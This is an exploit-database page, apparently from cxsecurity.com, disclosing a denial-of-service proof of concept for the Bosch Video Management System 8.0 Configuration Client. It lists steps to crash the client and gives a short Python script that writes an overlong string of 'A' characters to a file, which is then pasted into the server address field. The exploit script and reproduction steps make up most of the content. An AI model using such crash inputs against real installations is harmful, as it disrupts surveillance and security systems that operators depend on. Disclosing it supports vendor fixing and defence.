Bosch Video Management System 8.0 Configuration Client Denial of Service

2018.11.15
Credit: Daniel
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Bosch Video Management System 8.0-Configuration Client-Denial of Service (Poc) # Discovery by: Daniel # Discovery Date: 2018-11-12 # Software Name: Bosch Video Management System # Software Version: 8.0 # Vendor Homepage: https://www.boschsecurity.com/xc/en/products/management-software/bvms/ # Software Link: https://la.boschsecurity.com/es/productos/videosystems_1/videosoftware_1/videomanagementsystems_1/boschvideomanagementsyste_8/boschvideomanagementsyste_8_44761 # Tested on: Windows 10 Pro x64 #Make sure that during the installation of software you installed all the program features available. #This PoC was carried out in 'Configuration Client', which is part of 'Bosch Video Management System'. # Steps to produce the crash: # 1.- run: dos.py # 2.- Open bosch.txt and copy content to clipboard # 2.- Open Configuration Client (Normally the installer creates a direct link in desktop) # 3.- Click on 'Connection:' box and select "Address Book" # 4.- Copy clipboard in "(Enterprise) Management Server Address:" # 5.- write "test" in 'Username' # 6.- Write "test" in 'Password' # 7.- Click on 'OK' # 8.- Crash #!/usr/bin/python buf = "\x41" * 64 f = open('bosch.txt', 'w') f.write(buf) f.close()


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top